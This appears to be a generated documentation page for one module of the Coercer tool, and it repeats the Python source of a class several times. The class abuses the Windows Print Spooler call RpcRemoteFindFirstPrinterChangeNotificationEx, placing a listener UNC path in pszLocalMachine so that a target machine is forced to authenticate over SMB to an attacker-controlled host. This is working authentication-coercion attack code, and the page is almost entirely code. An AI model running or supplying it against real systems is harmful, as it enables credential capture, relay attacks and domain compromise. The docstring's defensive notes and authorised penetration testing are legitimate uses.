coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotificationEx

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : RpcRemoteFindFirstPrinterChangeNotificationEx.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 15 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from impacket.dcerpc.v5 import rprn
10from impacket.dcerpc.v5.dtypes import NULL
11
12
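class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)

    Mechanics (see ``trigger``): a printer handle is opened on the target's
    spooler with RpcOpenPrinter, then RpcRemoteFindFirstPrinterChangeNotificationEx
    is called with ``pszLocalMachine`` set to the listener path from
    ``exploit_paths``. That argument is the coercion vector: the target is
    made to authenticate to the listener over SMB.

    Defensive reading: the trigger needs the spooler interface reachable on
    one of the transports in ``access`` and the target able to reach the
    listener over SMB; removing either (spooler stopped, outbound SMB from
    the target blocked) stops this method.

    Method found by:
     -
    """

    # Listener path template(s). ``{{listener}}`` is presumably substituted
    # by the framework into ``self.path`` before ``trigger`` runs — verify
    # against MSPROTOCOLRPCCALL. Only a bare UNC host form is offered here.
    # The trailing NUL is deliberate: the RPC string field is NUL-terminated.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00')
    ]

    # Transports over which the MS-RPRN interface is bound.
    # NOTE(review): the first key is spelled "ncan_np" (not "ncacn_np");
    # presumably the dispatcher keys on that exact string — confirm before
    # renaming it. Both entries carry the same interface UUID; the case
    # difference between them is presumably cosmetic but should be unified.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN"
    }

    # ``vulnerable_arguments`` names the parameter that carries the
    # attacker-controlled path (set in ``trigger``).
    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotificationEx",
        "opnum": 65,
        "vulnerable_arguments": ["pszLocalMachine"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Fire the coercion over an already-bound DCE/RPC session.

        :param dcerpc_session: bound impacket DCERPC session to the target's
            spooler interface (one of the transports in ``access``), or None.
        :param target: host name / IP of the target; used to build the
            ``\\\\target`` printer-server name given to RpcOpenPrinter.
        :return: ``""`` when the notification call returned without raising;
            the caught exception object when any RPC step raised (returned
            rather than re-raised so the caller can classify it — an RPC
            error here is not necessarily a failed coercion); ``None`` when
            no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        handle = None
        try:
            # A handle to the print server itself (\\target) is sufficient;
            # no specific printer has to exist.
            resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
            handle = resp['pHandle']

            request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
            request['hPrinter'] = handle
            request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # The vulnerable argument: the path the target is told to
            # contact for change notifications (the listener).
            request['pszLocalMachine'] = self.path
            request['pOptions'] = NULL
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Broad on purpose: every RPC-layer error (including a
            # DCERPCSessionError carrying the status code) is handed back
            # to the caller unchanged instead of being interpreted here.
            return err
        finally:
            # Release the printer handle so each attempt does not leave a
            # dangling handle open on the target's spooler. Best effort:
            # a failure here must never mask the result of the trigger.
            if handle is not None:
                try:
                    rprn.hRpcClosePrinter(dcerpc_session, handle)
                except Exception:
                    pass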
class RpcRemoteFindFirstPrinterChangeNotificationEx(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
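class RpcRemoteFindFirstPrinterChangeNotificationEx(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)

    Mechanics (see ``trigger``): a printer handle is opened on the target's
    spooler with RpcOpenPrinter, then RpcRemoteFindFirstPrinterChangeNotificationEx
    is called with ``pszLocalMachine`` set to the listener path from
    ``exploit_paths``. That argument is the coercion vector: the target is
    made to authenticate to the listener over SMB.

    Defensive reading: the trigger needs the spooler interface reachable on
    one of the transports in ``access`` and the target able to reach the
    listener over SMB; removing either (spooler stopped, outbound SMB from
    the target blocked) stops this method.

    Method found by:
     -
    """

    # Listener path template(s). ``{{listener}}`` is presumably substituted
    # by the framework into ``self.path`` before ``trigger`` runs — verify
    # against MSPROTOCOLRPCCALL. Only a bare UNC host form is offered here.
    # The trailing NUL is deliberate: the RPC string field is NUL-terminated.
    exploit_paths = [
        ("smb", '\\\\{{listener}}\x00')
    ]

    # Transports over which the MS-RPRN interface is bound.
    # NOTE(review): the first key is spelled "ncan_np" (not "ncacn_np");
    # presumably the dispatcher keys on that exact string — confirm before
    # renaming it. Both entries carry the same interface UUID; the case
    # difference between them is presumably cosmetic but should be unified.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\spoolss",
                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
                "version": "1.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-RPRN]: Print System Remote Protocol",
        "shortname": "MS-RPRN"
    }

    # ``vulnerable_arguments`` names the parameter that carries the
    # attacker-controlled path (set in ``trigger``).
    function = {
        "name": "RpcRemoteFindFirstPrinterChangeNotificationEx",
        "opnum": 65,
        "vulnerable_arguments": ["pszLocalMachine"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Fire the coercion over an already-bound DCE/RPC session.

        :param dcerpc_session: bound impacket DCERPC session to the target's
            spooler interface (one of the transports in ``access``), or None.
        :param target: host name / IP of the target; used to build the
            ``\\\\target`` printer-server name given to RpcOpenPrinter.
        :return: ``""`` when the notification call returned without raising;
            the caught exception object when any RPC step raised (returned
            rather than re-raised so the caller can classify it — an RPC
            error here is not necessarily a failed coercion); ``None`` when
            no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        handle = None
        try:
            # A handle to the print server itself (\\target) is sufficient;
            # no specific printer has to exist.
            resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
            handle = resp['pHandle']

            request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
            request['hPrinter'] = handle
            request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # The vulnerable argument: the path the target is told to
            # contact for change notifications (the listener).
            request['pszLocalMachine'] = self.path
            request['pOptions'] = NULL
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Broad on purpose: every RPC-layer error (including a
            # DCERPCSessionError carrying the status code) is handed back
            # to the caller unchanged instead of being interpreted here.
            return err
        finally:
            # Release the printer handle so each attempt does not leave a
            # dangling handle open on the target's spooler. Best effort:
            # a failure here must never mask the result of the trigger.
            if handle is not None:
                try:
                    rprn.hRpcClosePrinter(dcerpc_session, handle)
                except Exception:
                    pass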

Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65) of [MS-RPRN]: Print System Remote Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d)

Method found by: -

exploit_paths = [('smb', '\\\\{{listener}}\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\spoolss', 'uuid': '12345678-1234-abcd-ef00-0123456789ab', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': '12345678-1234-ABCD-EF00-0123456789AB', 'version': '1.0'}]}
protocol = {'longname': '[MS-RPRN]: Print System Remote Protocol', 'shortname': 'MS-RPRN'}
function = {'name': 'RpcRemoteFindFirstPrinterChangeNotificationEx', 'opnum': 65, 'vulnerable_arguments': ['pszLocalMachine']}
def trigger(self, dcerpc_session, target):
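    def trigger(self, dcerpc_session, target):
        """
        Fire the coercion over an already-bound DCE/RPC session.

        :param dcerpc_session: bound impacket DCERPC session to the target's
            spooler interface, or None.
        :param target: host name / IP of the target; used to build the
            ``\\\\target`` printer-server name given to RpcOpenPrinter.
        :return: ``""`` when the notification call returned without raising;
            the caught exception object when any RPC step raised (returned
            rather than re-raised so the caller can classify it — an RPC
            error here is not necessarily a failed coercion); ``None`` when
            no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None

        handle = None
        try:
            # A handle to the print server itself (\\target) is sufficient;
            # no specific printer has to exist.
            resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
            handle = resp['pHandle']

            request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
            request['hPrinter'] = handle
            request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
            # The vulnerable argument: the path the target is told to
            # contact for change notifications; ``self.path`` is presumably
            # the listener UNC filled in by the framework — confirm.
            request['pszLocalMachine'] = self.path
            request['pOptions'] = NULL
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Broad on purpose: every RPC-layer error (including a
            # DCERPCSessionError carrying the status code) is handed back
            # to the caller unchanged instead of being interpreted here.
            return err
        finally:
            # Release the printer handle so each attempt does not leave a
            # dangling handle open on the target's spooler. Best effort:
            # a failure here must never mask the result of the trigger.
            if handle is not None:
                try:
                    rprn.hRpcClosePrinter(dcerpc_session, handle)
                except Exception:
                    pass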